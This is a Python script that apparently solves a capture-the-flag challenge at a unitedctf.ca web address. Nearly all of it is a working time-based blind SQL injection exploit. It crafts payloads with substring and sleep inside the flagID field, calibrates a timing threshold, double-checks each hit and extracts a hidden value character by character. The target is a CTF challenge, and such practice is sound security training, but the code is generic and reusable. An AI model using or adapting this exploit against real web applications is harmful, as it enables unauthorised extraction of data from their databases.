Time-Based SQLi

from requests import get,post,Session
from string import printable
from time import time
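url = "http://challenges.unitedctf.ca:18000/challenge4.php"

# Characters that would break the single-quoted SQL literal in the payload
# (a raw ' or \ only produces a syntax error, never a sleep), so sending
# them is a wasted request: the original could not detect them either.
_UNQUOTABLE = "'\\"


def build_payload(position: int, char: str, delay: float = 0.5) -> str:
    """Return the ``flagID`` value for one time-based oracle question.

    The injected ``if(...)`` makes MySQL sleep ``delay`` seconds when the
    1-based ``position`` character of ``flag`` equals ``char`` (the
    ``COLLATE utf8mb4_bin`` makes the comparison case-sensitive); otherwise
    the query returns immediately.  ``char`` must not be ``'`` or ``\\``.
    """
    return (
        f"1' and if(substring(flag,{position},1) = '{char}' "
        f"COLLATE utf8mb4_bin,sleep({delay}),'no')#"
    )


def measure(session, target: str, payload: str, timeout: float = 10.0) -> float:
    """POST ``payload`` as ``flagID`` to ``target`` and return the round-trip
    time in seconds.  ``timeout`` stops a hung server from stalling the run."""
    before = time()
    session.post(target, data={"flagID": payload}, timeout=timeout)
    return time() - before


def calibrate(session, target: str, delay: float = 0.5, samples: int = 3) -> float:
    """Return the detection threshold for this server/network.

    Sends a payload of the same shape that never sleeps and takes the slowest
    of ``samples`` round trips as the baseline; a fixed 0.45 s cut-off gives
    false positives as soon as latency jitter approaches the sleep time.
    """
    never_sleeps = f"1' and if(0,sleep({delay}),'no')#"
    baseline = max(measure(session, target, never_sleeps) for _ in range(samples))
    return baseline + delay / 2


def _find_char(session, target, position, candidates, delay, threshold, prefix):
    """Try every candidate for one position; return the match or None.

    A hit is only accepted after a second, confirming request so that a
    single latency spike does not insert a wrong character.
    """
    for char in candidates:
        print(prefix + char, end="\r")
        payload = build_payload(position, char, delay)
        if measure(session, target, payload) > threshold and \
                measure(session, target, payload) > threshold:
            return char
    return None


def extract_flag(session, target: str, length: int = 76, delay: float = 0.5,
                 alphabet: str = printable, retries: int = 3) -> str:
    """Recover ``length`` characters of the flag via the timing oracle.

    Each position is swept over ``alphabet`` (minus characters that cannot
    go inside the SQL literal); a position with no confirmed hit is retried
    ``retries`` times and then raises ``RuntimeError`` instead of looping
    forever, which the original ``while True`` did.
    """
    candidates = [c for c in alphabet if c not in _UNQUOTABLE]
    threshold = calibrate(session, target, delay)
    flag = []
    while len(flag) < length:
        position = len(flag) + 1  # substring() is 1-based
        for _ in range(retries):
            char = _find_char(session, target, position, candidates,
                              delay, threshold, "".join(flag))
            if char is not None:
                flag.append(char)
                break
        else:
            raise RuntimeError(
                f"no character matched at position {position} after "
                f"{retries} sweeps (recovered so far: {''.join(flag)!r})")
    return "".join(flag)


if __name__ == "__main__":
    with Session() as s:
        print(extract_flag(s, url))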
